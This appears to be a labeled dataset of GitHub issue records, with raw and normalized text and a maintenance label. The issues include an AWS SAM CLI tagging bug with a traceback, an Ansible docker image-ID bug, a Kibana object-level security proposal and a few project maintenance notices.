dashboard read only on the editor hello 👋 👀 background the restqa dashboard could be deployed on a remote server however some team would like to deploy the server in order to access to all the feature and run any of them ✌️ what is the actual behavior each feature file could be updated by anyone through the dashboard ui 🕵️‍♀️ how to reproduce the current behavior install restqa run the command restqa init to initialize a brand new project run the command restqa dashboard to launch the dashboard access the dashboard through the url go to editor menu and update one feature file 🤞 what is the expected behavior on some team setup we would prefer to not allow the user to edit the the feature when the restqa dashboard is deployed on a remote server 😎 proposed solution on the restqa yml configuration file we could add the property editable is the object restqa dashboard such as yaml restqa dashboard editable true the default value will be true the value could also be overrode by the environment variable restqa dashboard editable true example restqa dashboard editable false restqa dashboard or through the option e editable restqa dashboard editable false cheers
1
4,142
19,686,372,779
IssuesEvent
2022-01-11 22:46:09
aws/aws-sam-cli
https://api.github.com/repos/aws/aws-sam-cli
closed
Unable to create dynamo table with tags
type/bug stage/bug-repro maintainer/need-response
### Description: Traying to create dynamo table using AWS::Serverless::SimpleTable, but getting an error if I specify any tags ### Steps to reproduce: Run sam build on the template ### Observed result: PS C:\Work\Issues\AWS - SAM - dynamo table> sam build --debug 2022-01-07 12:32:12,548 | Telemetry endpoint configured to be https://aws-serverless-tools-telemetry.us-west-2.amazonaws.com/metrics 2022-01-07 12:32:12,548 | Using config file: samconfig.toml, config environment: default 2022-01-07 12:32:12,549 | Expand command line arguments to: 2022-01-07 12:32:12,549 | --template_file=C:\Work\Issues\AWS - SAM - dynamo table\template.yaml --build_dir=.aws-sam\build --cache_dir=.aws-sam\cache 2022-01-07 12:32:13,015 | 'build' command is called 2022-01-07 12:32:13,015 | Collected default values for parameters: {'Stage': 'lcl', 'OCTOEnv': 'DEV', 'TerraformTableName': 'terraform-lock-nmgr', 'AwsRegion': 'us-east-1'} 2022-01-07 12:32:13,031 | Sending Telemetry: {'metrics': [{'commandRun': {'requestId': 'a5721518-a4a2-4333-98fe-b32aa4936575', 'installationId': '2bcffb07-fa0b-4ced-a5d9-096faedc8c99', 'sessionId': '148f4db1-85c8-4eaa-9341-3358208b9bf9', 'executionEnvironment': 'CLI', 'ci': False, 'pyversion': '3.8.8', 'samcliVersion': '1.37.0', 'awsProfileProvided': False, 'debugFlagProvided': True, 'region': '', 'commandName': 'sam build', 'metricSpecificAttributes': {'projectType': 'CFN'}, 'duration': 483, 'exitReason': 'InvalidSamDocumentException', 'exitCode': 255}}]} 2022-01-07 12:32:13,574 | HTTPSConnectionPool(host='aws-serverless-tools-telemetry.us-west-2.amazonaws.com', port=443): Read timed out. (read timeout=0.1) Traceback (most recent call last): File "C:\Program Files\Amazon\AWSSAMCLI\runtime\lib\site-packages\samcli\lib\samlib\wrapper.py", line 68, in run_plugins parser.parse(template_copy, all_plugins) # parse() will run all configured plugins File "C:\Program Files\Amazon\AWSSAMCLI\runtime\lib\site-packages\samcli\lib\samlib\wrapper.py", line 102, in parse raise InvalidDocumentException(document_errors) samtranslator.model.exceptions.InvalidDocumentException: [InvalidResourceException('TerraformDynamoTable', "Type of property 'Tags' is invalid.")] The above exception was the direct cause of the following exception: Traceback (most recent call last): File "runpy.py", line 194, in _run_module_as_main File "runpy.py", line 87, in _run_code File "C:\Program Files\Amazon\AWSSAMCLI\runtime\lib\site-packages\samcli\__main__.py", line 12, in <module> cli(prog_name="sam") File "C:\Program Files\Amazon\AWSSAMCLI\runtime\lib\site-packages\click\core.py", line 829, in __call__ return self.main(*args, **kwargs) File "C:\Program Files\Amazon\AWSSAMCLI\runtime\lib\site-packages\click\core.py", line 782, in main rv = self.invoke(ctx) File "C:\Program Files\Amazon\AWSSAMCLI\runtime\lib\site-packages\click\core.py", line 1259, in invoke return _process_result(sub_ctx.command.invoke(sub_ctx)) File "C:\Program Files\Amazon\AWSSAMCLI\runtime\lib\site-packages\click\core.py", line 1066, in invoke return ctx.invoke(self.callback, **ctx.params) File "C:\Program Files\Amazon\AWSSAMCLI\runtime\lib\site-packages\click\core.py", line 610, in invoke return callback(*args, **kwargs) File "C:\Program Files\Amazon\AWSSAMCLI\runtime\lib\site-packages\click\decorators.py", line 73, in new_func return ctx.invoke(f, obj, *args, **kwargs) File "C:\Program Files\Amazon\AWSSAMCLI\runtime\lib\site-packages\click\core.py", line 610, in invoke return callback(*args, **kwargs) File "C:\Program Files\Amazon\AWSSAMCLI\runtime\lib\site-packages\samcli\lib\telemetry\metric.py", line 166, in wrapped raise exception # pylint: disable=raising-bad-type File "C:\Program Files\Amazon\AWSSAMCLI\runtime\lib\site-packages\samcli\lib\telemetry\metric.py", line 124, in wrapped return_value = func(*args, **kwargs) File "C:\Program Files\Amazon\AWSSAMCLI\runtime\lib\site-packages\samcli\lib\utils\version_checker.py", line 41, in wrapped actual_result = func(*args, **kwargs) File "C:\Program Files\Amazon\AWSSAMCLI\runtime\lib\site-packages\samcli\cli\main.py", line 87, in wrapper return func(*args, **kwargs) File "C:\Program Files\Amazon\AWSSAMCLI\runtime\lib\site-packages\samcli\commands\build\command.py", line 174, in cli do_cli( File "C:\Program Files\Amazon\AWSSAMCLI\runtime\lib\site-packages\samcli\commands\build\command.py", line 231, in do_cli with BuildContext( File "C:\Program Files\Amazon\AWSSAMCLI\runtime\lib\site-packages\samcli\commands\build\build_context.py", line 106, in __enter__ self.set_up() File "C:\Program Files\Amazon\AWSSAMCLI\runtime\lib\site-packages\samcli\commands\build\build_context.py", line 112, in set_up self._stacks, remote_stack_full_paths = SamLocalStackProvider.get_stacks( File "C:\Program Files\Amazon\AWSSAMCLI\runtime\lib\site-packages\samcli\lib\providers\sam_stack_provider.py", line 242, in get_stacks current = SamLocalStackProvider( File "C:\Program Files\Amazon\AWSSAMCLI\runtime\lib\site-packages\samcli\lib\providers\sam_stack_provider.py", line 51, in __init__ self._template_dict = self.get_template( File "C:\Program Files\Amazon\AWSSAMCLI\runtime\lib\site-packages\samcli\lib\providers\sam_base_provider.py", line 189, in get_template template_dict = SamTranslatorWrapper(template_dict, parameter_values=parameters_values).run_plugins() File "C:\Program Files\Amazon\AWSSAMCLI\runtime\lib\site-packages\samcli\lib\samlib\wrapper.py", line 70, in run_plugins raise InvalidSamDocumentException( samcli.commands.validate.lib.exceptions.InvalidSamDocumentException: [InvalidResourceException('TerraformDynamoTable', "Type of property 'Tags' is invalid.")] ('TerraformDynamoTable', "Type of property 'Tags' is invalid.") PS C:\Work\Issues\AWS - SAM - dynamo table> ### Expected result: Expected to see dynamo table created ### Additional environment details (Ex: Windows, Mac, Amazon Linux etc) 1. OS: Windows 2. `sam --version`: SAM CLI, version 1.37.0 3. AWS region: us-east-1 `Add --debug fla [Log.txt](https://github.com/aws/aws-sam-cli/files/7830662/Log.txt) g to command you are running` [cloudformation-terraformresources.txt](https://github.com/aws/aws-sam-cli/files/7830660/cloudformation-terraformresources.txt)
True
Unable to create dynamo table with tags - ### Description: Traying to create dynamo table using AWS::Serverless::SimpleTable, but getting an error if I specify any tags ### Steps to reproduce: Run sam build on the template ### Observed result: PS C:\Work\Issues\AWS - SAM - dynamo table> sam build --debug 2022-01-07 12:32:12,548 | Telemetry endpoint configured to be https://aws-serverless-tools-telemetry.us-west-2.amazonaws.com/metrics 2022-01-07 12:32:12,548 | Using config file: samconfig.toml, config environment: default 2022-01-07 12:32:12,549 | Expand command line arguments to: 2022-01-07 12:32:12,549 | --template_file=C:\Work\Issues\AWS - SAM - dynamo table\template.yaml --build_dir=.aws-sam\build --cache_dir=.aws-sam\cache 2022-01-07 12:32:13,015 | 'build' command is called 2022-01-07 12:32:13,015 | Collected default values for parameters: {'Stage': 'lcl', 'OCTOEnv': 'DEV', 'TerraformTableName': 'terraform-lock-nmgr', 'AwsRegion': 'us-east-1'} 2022-01-07 12:32:13,031 | Sending Telemetry: {'metrics': [{'commandRun': {'requestId': 'a5721518-a4a2-4333-98fe-b32aa4936575', 'installationId': '2bcffb07-fa0b-4ced-a5d9-096faedc8c99', 'sessionId': '148f4db1-85c8-4eaa-9341-3358208b9bf9', 'executionEnvironment': 'CLI', 'ci': False, 'pyversion': '3.8.8', 'samcliVersion': '1.37.0', 'awsProfileProvided': False, 'debugFlagProvided': True, 'region': '', 'commandName': 'sam build', 'metricSpecificAttributes': {'projectType': 'CFN'}, 'duration': 483, 'exitReason': 'InvalidSamDocumentException', 'exitCode': 255}}]} 2022-01-07 12:32:13,574 | HTTPSConnectionPool(host='aws-serverless-tools-telemetry.us-west-2.amazonaws.com', port=443): Read timed out. (read timeout=0.1) Traceback (most recent call last): File "C:\Program Files\Amazon\AWSSAMCLI\runtime\lib\site-packages\samcli\lib\samlib\wrapper.py", line 68, in run_plugins parser.parse(template_copy, all_plugins) # parse() will run all configured plugins File "C:\Program Files\Amazon\AWSSAMCLI\runtime\lib\site-packages\samcli\lib\samlib\wrapper.py", line 102, in parse raise InvalidDocumentException(document_errors) samtranslator.model.exceptions.InvalidDocumentException: [InvalidResourceException('TerraformDynamoTable', "Type of property 'Tags' is invalid.")] The above exception was the direct cause of the following exception: Traceback (most recent call last): File "runpy.py", line 194, in _run_module_as_main File "runpy.py", line 87, in _run_code File "C:\Program Files\Amazon\AWSSAMCLI\runtime\lib\site-packages\samcli\__main__.py", line 12, in <module> cli(prog_name="sam") File "C:\Program Files\Amazon\AWSSAMCLI\runtime\lib\site-packages\click\core.py", line 829, in __call__ return self.main(*args, **kwargs) File "C:\Program Files\Amazon\AWSSAMCLI\runtime\lib\site-packages\click\core.py", line 782, in main rv = self.invoke(ctx) File "C:\Program Files\Amazon\AWSSAMCLI\runtime\lib\site-packages\click\core.py", line 1259, in invoke return _process_result(sub_ctx.command.invoke(sub_ctx)) File "C:\Program Files\Amazon\AWSSAMCLI\runtime\lib\site-packages\click\core.py", line 1066, in invoke return ctx.invoke(self.callback, **ctx.params) File "C:\Program Files\Amazon\AWSSAMCLI\runtime\lib\site-packages\click\core.py", line 610, in invoke return callback(*args, **kwargs) File "C:\Program Files\Amazon\AWSSAMCLI\runtime\lib\site-packages\click\decorators.py", line 73, in new_func return ctx.invoke(f, obj, *args, **kwargs) File "C:\Program Files\Amazon\AWSSAMCLI\runtime\lib\site-packages\click\core.py", line 610, in invoke return callback(*args, **kwargs) File "C:\Program Files\Amazon\AWSSAMCLI\runtime\lib\site-packages\samcli\lib\telemetry\metric.py", line 166, in wrapped raise exception # pylint: disable=raising-bad-type File "C:\Program Files\Amazon\AWSSAMCLI\runtime\lib\site-packages\samcli\lib\telemetry\metric.py", line 124, in wrapped return_value = func(*args, **kwargs) File "C:\Program Files\Amazon\AWSSAMCLI\runtime\lib\site-packages\samcli\lib\utils\version_checker.py", line 41, in wrapped actual_result = func(*args, **kwargs) File "C:\Program Files\Amazon\AWSSAMCLI\runtime\lib\site-packages\samcli\cli\main.py", line 87, in wrapper return func(*args, **kwargs) File "C:\Program Files\Amazon\AWSSAMCLI\runtime\lib\site-packages\samcli\commands\build\command.py", line 174, in cli do_cli( File "C:\Program Files\Amazon\AWSSAMCLI\runtime\lib\site-packages\samcli\commands\build\command.py", line 231, in do_cli with BuildContext( File "C:\Program Files\Amazon\AWSSAMCLI\runtime\lib\site-packages\samcli\commands\build\build_context.py", line 106, in __enter__ self.set_up() File "C:\Program Files\Amazon\AWSSAMCLI\runtime\lib\site-packages\samcli\commands\build\build_context.py", line 112, in set_up self._stacks, remote_stack_full_paths = SamLocalStackProvider.get_stacks( File "C:\Program Files\Amazon\AWSSAMCLI\runtime\lib\site-packages\samcli\lib\providers\sam_stack_provider.py", line 242, in get_stacks current = SamLocalStackProvider( File "C:\Program Files\Amazon\AWSSAMCLI\runtime\lib\site-packages\samcli\lib\providers\sam_stack_provider.py", line 51, in __init__ self._template_dict = self.get_template( File "C:\Program Files\Amazon\AWSSAMCLI\runtime\lib\site-packages\samcli\lib\providers\sam_base_provider.py", line 189, in get_template template_dict = SamTranslatorWrapper(template_dict, parameter_values=parameters_values).run_plugins() File "C:\Program Files\Amazon\AWSSAMCLI\runtime\lib\site-packages\samcli\lib\samlib\wrapper.py", line 70, in run_plugins raise InvalidSamDocumentException( samcli.commands.validate.lib.exceptions.InvalidSamDocumentException: [InvalidResourceException('TerraformDynamoTable', "Type of property 'Tags' is invalid.")] ('TerraformDynamoTable', "Type of property 'Tags' is invalid.") PS C:\Work\Issues\AWS - SAM - dynamo table> ### Expected result: Expected to see dynamo table created ### Additional environment details (Ex: Windows, Mac, Amazon Linux etc) 1. OS: Windows 2. `sam --version`: SAM CLI, version 1.37.0 3. AWS region: us-east-1 `Add --debug fla [Log.txt](https://github.com/aws/aws-sam-cli/files/7830662/Log.txt) g to command you are running` [cloudformation-terraformresources.txt](https://github.com/aws/aws-sam-cli/files/7830660/cloudformation-terraformresources.txt)
main
unable to create dynamo table with tags description traying to create dynamo table using aws serverless simpletable but getting an error if i specify any tags steps to reproduce run sam build on the template observed result ps c work issues aws sam dynamo table sam build debug telemetry endpoint configured to be using config file samconfig toml config environment default expand command line arguments to template file c work issues aws sam dynamo table template yaml build dir aws sam build cache dir aws sam cache build command is called collected default values for parameters stage lcl octoenv dev terraformtablename terraform lock nmgr awsregion us east sending telemetry metrics httpsconnectionpool host aws serverless tools telemetry us west amazonaws com port read timed out read timeout traceback most recent call last file c program files amazon awssamcli runtime lib site packages samcli lib samlib wrapper py line in run plugins parser parse template copy all plugins parse will run all configured plugins file c program files amazon awssamcli runtime lib site packages samcli lib samlib wrapper py line in parse raise invaliddocumentexception document errors samtranslator model exceptions invaliddocumentexception the above exception was the direct cause of the following exception traceback most recent call last file runpy py line in run module as main file runpy py line in run code file c program files amazon awssamcli runtime lib site packages samcli main py line in cli prog name sam file c program files amazon awssamcli runtime lib site packages click core py line in call return self main args kwargs file c program files amazon awssamcli runtime lib site packages click core py line in main rv self invoke ctx file c program files amazon awssamcli runtime lib site packages click core py line in invoke return process result sub ctx command invoke sub ctx file c program files amazon awssamcli runtime lib site packages click core py line in invoke return ctx invoke self callback ctx params file c program files amazon awssamcli runtime lib site packages click core py line in invoke return callback args kwargs file c program files amazon awssamcli runtime lib site packages click decorators py line in new func return ctx invoke f obj args kwargs file c program files amazon awssamcli runtime lib site packages click core py line in invoke return callback args kwargs file c program files amazon awssamcli runtime lib site packages samcli lib telemetry metric py line in wrapped raise exception pylint disable raising bad type file c program files amazon awssamcli runtime lib site packages samcli lib telemetry metric py line in wrapped return value func args kwargs file c program files amazon awssamcli runtime lib site packages samcli lib utils version checker py line in wrapped actual result func args kwargs file c program files amazon awssamcli runtime lib site packages samcli cli main py line in wrapper return func args kwargs file c program files amazon awssamcli runtime lib site packages samcli commands build command py line in cli do cli file c program files amazon awssamcli runtime lib site packages samcli commands build command py line in do cli with buildcontext file c program files amazon awssamcli runtime lib site packages samcli commands build build context py line in enter self set up file c program files amazon awssamcli runtime lib site packages samcli commands build build context py line in set up self stacks remote stack full paths samlocalstackprovider get stacks file c program files amazon awssamcli runtime lib site packages samcli lib providers sam stack provider py line in get stacks current samlocalstackprovider file c program files amazon awssamcli runtime lib site packages samcli lib providers sam stack provider py line in init self template dict self get template file c program files amazon awssamcli runtime lib site packages samcli lib providers sam base provider py line in get template template dict samtranslatorwrapper template dict parameter values parameters values run plugins file c program files amazon awssamcli runtime lib site packages samcli lib samlib wrapper py line in run plugins raise invalidsamdocumentexception samcli commands validate lib exceptions invalidsamdocumentexception terraformdynamotable type of property tags is invalid ps c work issues aws sam dynamo table expected result expected to see dynamo table created additional environment details ex windows mac amazon linux etc os windows sam version sam cli version aws region us east add debug fla g to command you are running
1
1,672
6,574,093,878
IssuesEvent
2017-09-11 11:27:30
ansible/ansible-modules-core
https://api.github.com/repos/ansible/ansible-modules-core
closed
docker_container: unable to deal with image IDs
affects_2.2 bug_report cloud docker waiting_on_maintainer
##### ISSUE TYPE - Bug Report ##### COMPONENT NAME - `docker_container` ##### ANSIBLE VERSION ``` ansible 2.2.0.0 config file = /home/schwarz/code/infrastructure/ansible.cfg configured module search path = Default w/o overrides ``` ##### CONFIGURATION N/A ##### OS / ENVIRONMENT Debian GNU/Linux ##### SUMMARY `docker` allows addressing images by ID. Ansible should do the same. Otherwise it's impossible to create a container for an unnamed image. ##### STEPS TO REPRODUCE ``` sh $ docker pull alpine $ docker inspect --format={{.Id}} alpine sha256:baa5d63471ead618ff91ddfacf1e2c81bf0612bfeb1daf00eb0843a41fbfade3 $ ansible -m docker_container -a 'name=foo image=sha256:baa5d63471ead618ff91ddfacf1e2c81bf0612bfeb1daf00eb0843a41fbfade3 command=true' localhost ``` ##### EXPECTED RESULTS The output should be the same as from `ansible -m docker_container -a 'name=foo image=alpine command=true' localhost`. ``` localhost | SUCCESS => { "ansible_facts": {}, "changed": true } ``` ##### ACTUAL RESULTS Instead Ansible tries to pull the image by its ID and naturally fails at that. ``` localhost | FAILED! => { "changed": false, "failed": true, "msg": "Error pulling sha256 - code: None message: Error: image library/sha256:baa5d63471ead618ff91ddfacf1e2c81bf0612bfeb1daf00eb0843a41fbfade3 not found" } ```
True
docker_container: unable to deal with image IDs - ##### ISSUE TYPE - Bug Report ##### COMPONENT NAME - `docker_container` ##### ANSIBLE VERSION ``` ansible 2.2.0.0 config file = /home/schwarz/code/infrastructure/ansible.cfg configured module search path = Default w/o overrides ``` ##### CONFIGURATION N/A ##### OS / ENVIRONMENT Debian GNU/Linux ##### SUMMARY `docker` allows addressing images by ID. Ansible should do the same. Otherwise it's impossible to create a container for an unnamed image. ##### STEPS TO REPRODUCE ``` sh $ docker pull alpine $ docker inspect --format={{.Id}} alpine sha256:baa5d63471ead618ff91ddfacf1e2c81bf0612bfeb1daf00eb0843a41fbfade3 $ ansible -m docker_container -a 'name=foo image=sha256:baa5d63471ead618ff91ddfacf1e2c81bf0612bfeb1daf00eb0843a41fbfade3 command=true' localhost ``` ##### EXPECTED RESULTS The output should be the same as from `ansible -m docker_container -a 'name=foo image=alpine command=true' localhost`. ``` localhost | SUCCESS => { "ansible_facts": {}, "changed": true } ``` ##### ACTUAL RESULTS Instead Ansible tries to pull the image by its ID and naturally fails at that. ``` localhost | FAILED! => { "changed": false, "failed": true, "msg": "Error pulling sha256 - code: None message: Error: image library/sha256:baa5d63471ead618ff91ddfacf1e2c81bf0612bfeb1daf00eb0843a41fbfade3 not found" } ```
main
docker container unable to deal with image ids issue type bug report component name docker container ansible version ansible config file home schwarz code infrastructure ansible cfg configured module search path default w o overrides configuration n a os environment debian gnu linux summary docker allows addressing images by id ansible should do the same otherwise it s impossible to create a container for an unnamed image steps to reproduce sh docker pull alpine docker inspect format id alpine ansible m docker container a name foo image command true localhost expected results the output should be the same as from ansible m docker container a name foo image alpine command true localhost localhost success ansible facts changed true actual results instead ansible tries to pull the image by its id and naturally fails at that localhost failed changed false failed true msg error pulling code none message error image library not found
1
16,620
9,853,207,050
IssuesEvent
2019-06-19 14:21:35
elastic/kibana
https://api.github.com/repos/elastic/kibana
opened
Object Level Security
Team:Security enhancement
## Object Level Security ### ACL To enable OLS, an ACL with the following format will be attached to all securable objects: ``` { "owner": 123456789, "read": { "users": [ { id: 123456789, can_share: true } ], "roles": [ { id: "role_one", can_share: false } ] }, "write": { "users": [ { id: 123456789, can_share: true } ], "roles": [ { id: "role_one", can_share: false } ] } } ``` The users and roles above reference Elasticsearch users and roles. In addition to the Elasticsearch roles, we will utilize a role of `*` to denote all authenticated users. If the user has **write** they will implicitly be granted **read**. When a user or role is assigned **read** or **write** they will be able to specify whether this user or role will be able to share the securable object with others. If the user has **read** and they can share the object, they will only be able to add other users and roles to **read**. If the user has **write** and they can share the object, they will be able to add other users and roles to **write** and **read**. ### Implicit read permissions When a user has **read** access to a Dashboard, they will implicitly be granted **read** access to all related Visualizations and Saved Searches. The same logic will apply once Index Patterns themselves are made securable and if a user has **read** access to a Visualization or Saved Search, they will be implicitly granted **read** access to the Index Pattern. This simplifies the access model and allows users to assign access to the object that they intuitively wish to share without having to concern themselves with the graph of related objects. It also simplifies the technical implementation so we don’t have to explicitly assign access to the related objects and then determine if/when it should be removed when a parent object’s ACL is modified. When a user is implicitly granted **read** access to a Visualization or Saved Search, it won’t show up in the user’s list of Visualizations or Saved Searches, it will only be accessible in the Dashboard UI/API. This is similar to how we’ll implement it technically, we’ll allow users to gain access to the related objects via the Dashboard, which will implicitly be granting them **read** access. ### Summary Phase 4 will make Saved Searches, Dashboards, Visualizations, Index Patterns and other Kibana applications (Machine Learning, Graph, Timelion) saved objects securable based on the previously described ACL. When an object has no owner, it emulates the way that Kibana currently functions without OLS where all authenticated Kibana users have full permissions. This is purely to support migrations from older versions of Kibana that didn’t have OLS, or users that were running Kibana without security and then enabling security with OLS. An additional “Claim unowned object” privilege will be added to the kibana_user role, and the user will have to have this privilege to claim these unowned objects. The introduction of owned Index Patterns necessitates the addition of per-user Kibana Advanced Settings, as the default index pattern is defined here. An additional section will be added to the Advanced Settings page to allow a user to override any advanced setting, the same capability will be added to the index management page. When a securable object has no owner, they will see a dialog similar to the following allowing them to make themselves the owner: ![screen shot 2018-03-09 at 10 28 06 am](https://user-images.githubusercontent.com/627123/37424187-4d01f5f0-2796-11e8-9e8d-cc2608f420a8.png) A securable object with no owner will be represented by the non-existence of an ACL. When a securable object has an owner, they will see a dialog similar to the following allowing them to transfer ownership and define which users and roles can read/write the object: ![untitled](https://user-images.githubusercontent.com/627123/37487123-f870d3b8-2866-11e8-94c8-4cff349c810c.png) System administrators will always be able to transfer ownership amd modify the ACL of a securable object, incase a user erroneously claims ownership of an owned object. All users that have a role granting them a Kibana custom privilege for the specific Kibana instance will be listed, and all roles that have a Kibana custom privilege for the Kibana specific instance will be listed as well. It should be noted that for Kibana to be able to fully enumerate users, we will have to introduce the concept of user profiles in Kibana (that could potentially power the user specific settings) or have Elasticsearch create users for non-native realms. Currently, Elasticsearch is unable to enumerate all users for SAML/LDAP/etc. realms as these are powered by role mappings. The list of Saved Searches, Dashboards, Visualizations and Index Patterns will have an owner column added, similar to the following: ![screen shot 2018-03-09 at 11 11 16 am](https://user-images.githubusercontent.com/627123/37424269-7553c060-2796-11e8-9d4f-3094c33469cd.png) From this phase forward, all new securable objects will be owned by the creator and they will have to share them with others. This same logic applies to objects that are imported. They will be owned by the user importing them, and can then be shared. Additional Kibana applications (Graph, Timelion) will be modified to support a similar mechanism of claiming/transferring ownership, and listing the current owner. In the future, there’s potential for the Kibana admin to be able to define default permissions for different users, or to use RBAC to limit users being able to create private or public securable objects. However, this level of control will not be introduced in this phase, as it might not be needed and it increases the complexity and implementation time.
True
Object Level Security - ## Object Level Security ### ACL To enable OLS, an ACL with the following format will be attached to all securable objects: ``` { "owner": 123456789, "read": { "users": [ { id: 123456789, can_share: true } ], "roles": [ { id: "role_one", can_share: false } ] }, "write": { "users": [ { id: 123456789, can_share: true } ], "roles": [ { id: "role_one", can_share: false } ] } } ``` The users and roles above reference Elasticsearch users and roles. In addition to the Elasticsearch roles, we will utilize a role of `*` to denote all authenticated users. If the user has **write** they will implicitly be granted **read**. When a user or role is assigned **read** or **write** they will be able to specify whether this user or role will be able to share the securable object with others. If the user has **read** and they can share the object, they will only be able to add other users and roles to **read**. If the user has **write** and they can share the object, they will be able to add other users and roles to **write** and **read**. ### Implicit read permissions When a user has **read** access to a Dashboard, they will implicitly be granted **read** access to all related Visualizations and Saved Searches. The same logic will apply once Index Patterns themselves are made securable and if a user has **read** access to a Visualization or Saved Search, they will be implicitly granted **read** access to the Index Pattern. This simplifies the access model and allows users to assign access to the object that they intuitively wish to share without having to concern themselves with the graph of related objects. It also simplifies the technical implementation so we don’t have to explicitly assign access to the related objects and then determine if/when it should be removed when a parent object’s ACL is modified. When a user is implicitly granted **read** access to a Visualization or Saved Search, it won’t show up in the user’s list of Visualizations or Saved Searches, it will only be accessible in the Dashboard UI/API. This is similar to how we’ll implement it technically, we’ll allow users to gain access to the related objects via the Dashboard, which will implicitly be granting them **read** access. ### Summary Phase 4 will make Saved Searches, Dashboards, Visualizations, Index Patterns and other Kibana applications (Machine Learning, Graph, Timelion) saved objects securable based on the previously described ACL. When an object has no owner, it emulates the way that Kibana currently functions without OLS where all authenticated Kibana users have full permissions. This is purely to support migrations from older versions of Kibana that didn’t have OLS, or users that were running Kibana without security and then enabling security with OLS. An additional “Claim unowned object” privilege will be added to the kibana_user role, and the user will have to have this privilege to claim these unowned objects. The introduction of owned Index Patterns necessitates the addition of per-user Kibana Advanced Settings, as the default index pattern is defined here. An additional section will be added to the Advanced Settings page to allow a user to override any advanced setting, the same capability will be added to the index management page. When a securable object has no owner, they will see a dialog similar to the following allowing them to make themselves the owner: ![screen shot 2018-03-09 at 10 28 06 am](https://user-images.githubusercontent.com/627123/37424187-4d01f5f0-2796-11e8-9e8d-cc2608f420a8.png) A securable object with no owner will be represented by the non-existence of an ACL. When a securable object has an owner, they will see a dialog similar to the following allowing them to transfer ownership and define which users and roles can read/write the object: ![untitled](https://user-images.githubusercontent.com/627123/37487123-f870d3b8-2866-11e8-94c8-4cff349c810c.png) System administrators will always be able to transfer ownership amd modify the ACL of a securable object, incase a user erroneously claims ownership of an owned object. All users that have a role granting them a Kibana custom privilege for the specific Kibana instance will be listed, and all roles that have a Kibana custom privilege for the Kibana specific instance will be listed as well. It should be noted that for Kibana to be able to fully enumerate users, we will have to introduce the concept of user profiles in Kibana (that could potentially power the user specific settings) or have Elasticsearch create users for non-native realms. Currently, Elasticsearch is unable to enumerate all users for SAML/LDAP/etc. realms as these are powered by role mappings. The list of Saved Searches, Dashboards, Visualizations and Index Patterns will have an owner column added, similar to the following: ![screen shot 2018-03-09 at 11 11 16 am](https://user-images.githubusercontent.com/627123/37424269-7553c060-2796-11e8-9d4f-3094c33469cd.png) From this phase forward, all new securable objects will be owned by the creator and they will have to share them with others. This same logic applies to objects that are imported. They will be owned by the user importing them, and can then be shared. Additional Kibana applications (Graph, Timelion) will be modified to support a similar mechanism of claiming/transferring ownership, and listing the current owner. In the future, there’s potential for the Kibana admin to be able to define default permissions for different users, or to use RBAC to limit users being able to create private or public securable objects. However, this level of control will not be introduced in this phase, as it might not be needed and it increases the complexity and implementation time.
non_main
object level security object level security acl to enable ols an acl with the following format will be attached to all securable objects owner read users roles write users roles the users and roles above reference elasticsearch users and roles in addition to the elasticsearch roles we will utilize a role of to denote all authenticated users if the user has write they will implicitly be granted read when a user or role is assigned read or write they will be able to specify whether this user or role will be able to share the securable object with others if the user has read and they can share the object they will only be able to add other users and roles to read if the user has write and they can share the object they will be able to add other users and roles to write and read implicit read permissions when a user has read access to a dashboard they will implicitly be granted read access to all related visualizations and saved searches the same logic will apply once index patterns themselves are made securable and if a user has read access to a visualization or saved search they will be implicitly granted read access to the index pattern this simplifies the access model and allows users to assign access to the object that they intuitively wish to share without having to concern themselves with the graph of related objects it also simplifies the technical implementation so we don’t have to explicitly assign access to the related objects and then determine if when it should be removed when a parent object’s acl is modified when a user is implicitly granted read access to a visualization or saved search it won’t show up in the user’s list of visualizations or saved searches it will only be accessible in the dashboard ui api this is similar to how we’ll implement it technically we’ll allow users to gain access to the related objects via the dashboard which will implicitly be granting them read access summary phase will make saved searches dashboards visualizations index patterns and other kibana applications machine learning graph timelion saved objects securable based on the previously described acl when an object has no owner it emulates the way that kibana currently functions without ols where all authenticated kibana users have full permissions this is purely to support migrations from older versions of kibana that didn’t have ols or users that were running kibana without security and then enabling security with ols an additional “claim unowned object” privilege will be added to the kibana user role and the user will have to have this privilege to claim these unowned objects the introduction of owned index patterns necessitates the addition of per user kibana advanced settings as the default index pattern is defined here an additional section will be added to the advanced settings page to allow a user to override any advanced setting the same capability will be added to the index management page when a securable object has no owner they will see a dialog similar to the following allowing them to make themselves the owner a securable object with no owner will be represented by the non existence of an acl when a securable object has an owner they will see a dialog similar to the following allowing them to transfer ownership and define which users and roles can read write the object system administrators will always be able to transfer ownership amd modify the acl of a securable object incase a user erroneously claims ownership of an owned object all users that have a role granting them a kibana custom privilege for the specific kibana instance will be listed and all roles that have a kibana custom privilege for the kibana specific instance will be listed as well it should be noted that for kibana to be able to fully enumerate users we will have to introduce the concept of user profiles in kibana that could potentially power the user specific settings or have elasticsearch create users for non native realms currently elasticsearch is unable to enumerate all users for saml ldap etc realms as these are powered by role mappings the list of saved searches dashboards visualizations and index patterns will have an owner column added similar to the following from this phase forward all new securable objects will be owned by the creator and they will have to share them with others this same logic applies to objects that are imported they will be owned by the user importing them and can then be shared additional kibana applications graph timelion will be modified to support a similar mechanism of claiming transferring ownership and listing the current owner in the future there’s potential for the kibana admin to be able to define default permissions for different users or to use rbac to limit users being able to create private or public securable objects however this level of control will not be introduced in this phase as it might not be needed and it increases the complexity and implementation time
0
2,174
7,612,958,846
IssuesEvent
2018-05-01 19:26:31
walbourn/directx-sdk-samples
https://api.github.com/repos/walbourn/directx-sdk-samples
closed
Retire VS 2013 projects
maintainence
I'll be removing the VS 2013 projects in 2018. I'll continue to support VS 2015 and VS 2017
True
Retire VS 2013 projects - I'll be removing the VS 2013 projects in 2018. I'll continue to support VS 2015 and VS 2017
main
retire vs projects i ll be removing the vs projects in i ll continue to support vs and vs
1
4,641
24,031,830,842
IssuesEvent
2022-09-15 15:35:36
ClaudiuCreanga/magento2-store-locator-stockists-extension
https://api.github.com/repos/ClaudiuCreanga/magento2-store-locator-stockists-extension
opened
Looking for maintainer
maintainer wanted
Looking for a maintainer to take control of this project and move it forward. There are new releases of magento2 and apparently some things stopped working, i.e. issue https://github.com/ClaudiuCreanga/magento2-store-locator-stockists-extension/issues/29. As I no longer work with magento, I don't have time to debug the issue. Anyone interested, post your availability here.
True
Looking for maintainer - Looking for a maintainer to take control of this project and move it forward. There are new releases of magento2 and apparently some things stopped working, i.e. issue https://github.com/ClaudiuCreanga/magento2-store-locator-stockists-extension/issues/29. As I no longer work with magento, I don't have time to debug the issue. Anyone interested, post your availability here.
main
